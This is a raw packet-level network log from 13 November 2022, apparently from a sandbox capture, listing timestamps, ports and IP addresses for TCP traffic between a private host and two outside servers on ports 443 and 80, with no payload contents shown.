Nov 13, 2022 19:26:49.748613119 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:49.748639107 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.236835957 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.237086058 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.285685062 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.285739899 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.286483049 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.286737919 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.287277937 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.287300110 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694597006 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694730997 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.694792032 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.694830894 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696415901 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696441889 CET	443	49697	175.98.167.165	192.168.2.3
Nov 13, 2022 19:26:50.696466923 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:50.696533918 CET	49697	443	192.168.2.3	175.98.167.165
Nov 13, 2022 19:26:51.585938931 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.794390917 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:51.794640064 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.795133114 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:51.994139910 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000014067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000138044 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000183105 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000225067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000261068 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000277042 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000313997 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000363111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000385046 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000435114 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000454903 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000504017 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000525951 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000581980 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000592947 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000633001 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000658989 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000716925 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.000727892 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.000770092 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194159031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194242954 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194303036 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194353104 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194401026 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194463015 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194478035 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194503069 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194545031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194587946 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194613934 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194658995 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194681883 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194709063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194742918 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194761038 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194802999 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194828987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194880962 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.194896936 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194942951 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.194962978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195020914 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195030928 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195075989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195101976 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195158958 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195168972 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195214033 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195231915 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195291042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195302010 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195353985 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195364952 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195410967 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.195431948 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.195487976 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385291100 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385369062 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385411978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385436058 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385490894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385512114 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385562897 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385580063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385627031 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385651112 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385713100 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385724068 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385766983 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385795116 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385854006 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385864019 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385907888 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.385929108 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385986090 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.385998964 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386040926 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386065960 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386117935 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386136055 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386188984 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386199951 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386245966 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386269093 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386322975 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386352062 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386399984 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386410952 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386456966 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386478901 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386535883 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386545897 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386584044 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386610985 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386660099 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386679888 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386728048 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386749983 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386795998 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386816025 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386868000 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386883974 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.386935949 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.386955976 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387006044 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387022018 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387070894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387090921 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387147903 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387160063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387197018 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387228966 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387281895 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387301922 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387358904 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387370110 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387407064 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387437105 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387485981 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387506008 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387562037 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387572050 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387612104 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387638092 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387687922 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387707949 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387756109 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387774944 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387824059 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387840986 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387892008 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387908936 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.387958050 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.387978077 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.388026953 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577270031 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577344894 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577378988 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577421904 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577440977 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577481031 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577511072 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577559948 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577580929 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577630997 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577651978 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577701092 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577719927 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577769995 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577790976 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577840090 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577861071 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577908993 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.577930927 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.577977896 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578000069 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578047991 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578069925 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578115940 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578140020 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578186035 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578211069 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578255892 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578283072 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578327894 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578350067 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578397989 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578419924 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578464031 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578490019 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578535080 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578557968 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578600883 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578627110 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578670025 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578696012 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578738928 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578762054 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578804970 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578830004 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578875065 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578898907 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.578944921 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.578969002 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579013109 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579035997 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579078913 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579102993 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579149008 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579171896 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579216003 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579238892 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579288960 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579308033 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579359055 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579374075 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579418898 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579441071 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579485893 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579508066 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579552889 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579576015 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579622030 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579644918 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579690933 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579715014 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579760075 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579782009 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579827070 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579848051 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579894066 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579916000 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.579962015 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.579983950 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580029011 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580050945 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580100060 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580146074 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580190897 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580216885 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580260992 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580288887 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580347061 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580357075 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580391884 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580421925 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580466986 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580492020 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580535889 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580559015 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580602884 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580625057 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580671072 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580693007 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580739975 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580763102 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580806971 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580832005 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580876112 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580899000 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.580941916 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.580965042 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581008911 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581032038 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581077099 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581098080 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581142902 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581165075 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581208944 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581233025 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581278086 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581302881 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581352949 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581368923 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581402063 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581438065 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581482887 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581506014 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581551075 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581572056 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581617117 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581639051 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581695080 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581711054 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581758022 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581778049 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581823111 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581844091 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581887960 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581914902 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.581960917 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.581984043 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582027912 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582051039 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582096100 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582117081 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582161903 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582185984 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582230091 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582254887 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582298994 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582326889 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582371950 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582393885 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582437992 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582459927 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582504988 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582528114 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582571983 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582593918 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582638979 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582662106 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582707882 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.582731009 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.582775116 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768119097 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768208981 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768260956 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768318892 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768337011 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768388987 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768405914 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768450022 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768476963 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768534899 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768547058 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768591881 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768634081 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768692970 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768706083 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768758059 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768774033 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768817902 CET	49699	80	192.168.2.3	47.92.35.35
Nov 13, 2022 19:26:52.768862009 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768914938 CET	80	49699	47.92.35.35	192.168.2.3
Nov 13, 2022 19:26:52.768939972 CET	49699	80	192.168.2.3	47.92.35.35
